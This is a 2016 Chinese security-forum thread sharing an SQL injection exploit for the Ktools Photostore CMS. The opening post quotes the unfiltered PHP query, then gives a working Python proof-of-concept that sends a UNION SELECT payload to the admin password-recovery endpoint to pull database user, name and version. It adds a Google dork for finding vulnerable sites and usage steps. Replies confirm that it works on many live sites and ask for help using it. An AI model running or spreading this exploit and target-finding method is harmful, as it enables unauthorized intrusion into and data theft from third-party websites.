请选择 进入手机版 | 继续访问电脑版

SSS安全论坛

 找回密码
 立即注册

QQ登录

只需一步,快速开始

产品
产品
团队
团队
版规
版规
查看: 1763|回复: 22

国外某开源cms利用exp

[复制链接]
  • TA的每日心情
    奋斗
    昨天 13:27
  • 签到天数: 295 天

    [LV.8]以坛为家I

    发表于 2016-7-2 18:23:54 | 显示全部楼层 |阅读模式
    本帖最后由 轩轩 于 2016-7-2 18:27 编辑

    ragecomic.png




    听说这什么程序叫:Ktools Photostore


    这个是某程序的漏洞代码:
    [Python] 纯文本查看 复制代码
    case 'recover_login': {
                                                    mysqli_query( $db, '' . 'SELECT username,password,email,admin_id FROM ' . $dbinfo[pre] . 'admins where email = \'' . $_POST['email'] . '\'' );
                                                    $result = ;
                                                    mysqli_num_rows( $result );
                                                    $returned_rows = ;
                                                    mysqli_fetch_array( $result );
                                                    $db_admin_user = ;




    然后,我感觉这程序是在逗我,这么大的程序,tM这句代码什么意思?
    [PHP] 纯文本查看 复制代码
    mysqli_query( $db, '' . 'SELECT username,password,email,admin_id FROM ' . $dbinfo[pre] . 'admins where email = \'' . $_POST['email'] . '\'' );

    完全没过滤啊,有没有?有没有??


    poc

    [Python] 纯文本查看 复制代码
    #coding:utf-8
    import urllib
    import re
    import urllib2
    import sys
    
    def Photostore():
        url=sys.argv[0]
        poc='/manager/mgr.login.php?pmode=recover_login'
        exp={
            'email':"RmGc' UNION ALL SELECT 33,33,concat(0x7E,hex(user()),0x7E,hex(database()),0x7E,hex(version()),0x7E),33#"
        }
        url_code=urllib.urlencode(exp)
        requrl=url+poc
        if urllib.urlopen(requrl).code == 200:
            req=urllib2.Request(url=requrl,data=url_code)
            body=urllib2.urlopen(req).read()
            print '数据库基本信息(使用hex解码,使用~分隔)'
            print re.search("\[([^<]+)\]",body).group()
            print '此代码为poc,修改为exp请自行修改exp中的email'
    
    if '__main__'== __name__:
        Photostore()




    谷歌语法:
    inurl:mgr.login.php






    一定要用谷歌啊啊啊啊啊啊啊




    使用方法:

    使用方法:

    1.python2.x环境

    2.文件名.py  网址

    如:

    sss.py http://www.sssie.com



    回复

    使用道具 举报

  • TA的每日心情
    无聊
    3 天前
  • 签到天数: 190 天

    [LV.7]常住居民III

    发表于 2016-7-3 10:37:45 | 显示全部楼层
    测试OK可用,现在还很多有漏洞的站,谢了楼主
    QQ图片20160703103718.png
  • TA的每日心情

    2016-11-10 07:51
  • 签到天数: 43 天

    [LV.5]常住居民I

    发表于 2016-7-3 03:14:50 | 显示全部楼层
    请问文件呢?
  • TA的每日心情
    奋斗
    昨天 13:27
  • 签到天数: 295 天

    [LV.8]以坛为家I

     楼主| 发表于 2016-7-3 04:21:13 | 显示全部楼层

    谷歌语法:
    inurl:mgr.login.php






    一定要用谷歌啊啊啊啊啊啊啊
  • TA的每日心情
    郁闷
    2017-1-12 22:24
  • 签到天数: 54 天

    [LV.5]常住居民I

    发表于 2016-7-3 09:53:01 | 显示全部楼层
    居然又是你
  • TA的每日心情
    奋斗
    昨天 13:27
  • 签到天数: 295 天

    [LV.8]以坛为家I

     楼主| 发表于 2016-7-3 10:00:06 | 显示全部楼层

    啥叫居然啊
  • TA的每日心情
    无聊
    3 天前
  • 签到天数: 115 天

    [LV.6]常住居民II

    发表于 2016-7-3 14:05:54 | 显示全部楼层
    Kernel.C 发表于 2016-7-3 10:37
    测试OK可用,现在还很多有漏洞的站,谢了楼主

    求大表哥的利用方法
  • TA的每日心情
    奋斗
    昨天 13:27
  • 签到天数: 295 天

    [LV.8]以坛为家I

     楼主| 发表于 2016-7-3 14:15:03 | 显示全部楼层
    Kernel.C 发表于 2016-7-3 10:37
    测试OK可用,现在还很多有漏洞的站,谢了楼主

    不谢啊
    头像被屏蔽
  • TA的每日心情
    擦汗
    2016-9-29 15:32
  • 签到天数: 111 天

    [LV.6]常住居民II

    发表于 2016-7-3 17:14:05 | 显示全部楼层
    提示: 作者被禁止或删除 内容自动屏蔽
  • TA的每日心情
    擦汗
    2016-11-18 17:41
  • 签到天数: 105 天

    [LV.6]常住居民II

    发表于 2016-7-3 17:55:59 | 显示全部楼层
    轩轩 发表于 2016-7-3 04:21
    谷歌语法:
    inurl:mgr.login.php

    给个谷歌网址
    您需要登录后才可以回帖 登录 | 立即注册

    本版积分规则

    关闭

    站长推荐上一条 /1 下一条

    关注微信赢邀请码

    QQ|Archiver|手机版|网站地图|网页地图|SSS安全论坛 ( 黔ICP备15010987号  

    GMT+8, 2017-1-21 06:07 , Processed in 0.183328 second(s), 37 queries .

    Powered by SSS团队 X3.2

    © 2014-2015 Comsenz Inc.

    快速回复 返回顶部 返回列表